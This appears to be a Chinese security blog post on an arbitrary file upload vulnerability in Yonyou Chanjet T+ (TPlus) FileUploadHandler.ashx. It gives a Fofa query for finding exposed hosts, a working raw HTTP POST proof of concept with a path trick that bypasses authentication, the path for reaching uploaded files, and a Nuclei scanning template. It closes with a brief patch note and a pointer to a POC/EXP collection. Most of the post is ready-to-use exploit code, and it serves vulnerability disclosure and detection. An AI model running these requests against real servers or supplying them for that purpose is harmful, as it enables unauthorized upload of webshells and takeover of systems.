》》》产品描述《《《
用友畅捷通-TPlus是由用友集团成员企业畅捷通公司开发的一款企业级财务管理工具,旨在帮助企业实现财务管理的现代化和智能化。作为畅捷通旗下的核心产品,TPlus集成了财务核算、资金管理、预算控制等多项核心功能,通过自动化和智能化的手段,提高企业财务管理效率,降低运营成本。
》》》漏洞描述《《《
用友畅捷通T+ FileUploadHandler.ashx存在任意文件上传漏洞,攻击者通过该漏洞可以上传任意文件,可能导致服务器被控制。
》》》搜索语句《《《
Fofa:app="畅捷通-TPlus"
》》》漏洞复现《《《
POC
POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 180
Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
--f95ec6be8c3acff8e3edd3d910d3b9a6
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: image/jpeg
hello,world!
--f95ec6be8c3acff8e3edd3d910d3b9a6--
上传成功后拼接路径进行访问:
http://your-ip:port/tplus/UserFiles/test.txt
yaml
id: 用友畅捷通-TPlus FileUploadHandler.ashx 任意文件上传
info:
name: Tplus File Upload Vulnerability
author: Kelichen
severity: high
description: |
This template checks for an arbitrary file upload vulnerability in the Tplus application.
http:
- raw:
- |
POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
--f95ec6be8c3acff8e3edd3d910d3b9a6
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: image/jpeg
hello,world!
--f95ec6be8c3acff8e3edd3d910d3b9a6--
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "image/jpeg"
part: body》》》修复建议《《《
厂商已发布补丁 请即时修复。
标签:--,FileUploadHandler,Content,TPlus,ashx,f95ec6be8c3acff8e3edd3d910d3b9a6,捷通 From: https://blog.csdn.net/qq_48368964/article/details/142643837-------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)
-------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------